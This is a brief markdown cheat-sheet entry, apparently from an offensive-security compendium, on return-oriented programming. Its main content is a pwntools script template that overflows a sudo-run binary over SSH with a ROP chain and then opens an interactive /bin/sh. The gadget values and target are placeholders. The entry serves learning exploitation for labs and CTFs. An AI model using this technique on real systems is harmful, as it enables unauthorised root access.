killchain-compendium/exploit/binaries/buffer_overflow/ropping.md

# ROP Chaining

## Usage

* Find cyclic buffer size
* Find gadgets via `ropper` or even better `ropstar`

## Example
```python
from pwn import *

s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
p = s.process(['sudo', '<process>'])

offset=<found_offset_len>

# take the ropchain from ropstar
payload = cyclic(offset)
payload += p64(0x4711)
payload += p64(0x235)
payload += p64(0x007)

print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive(prompt='')
```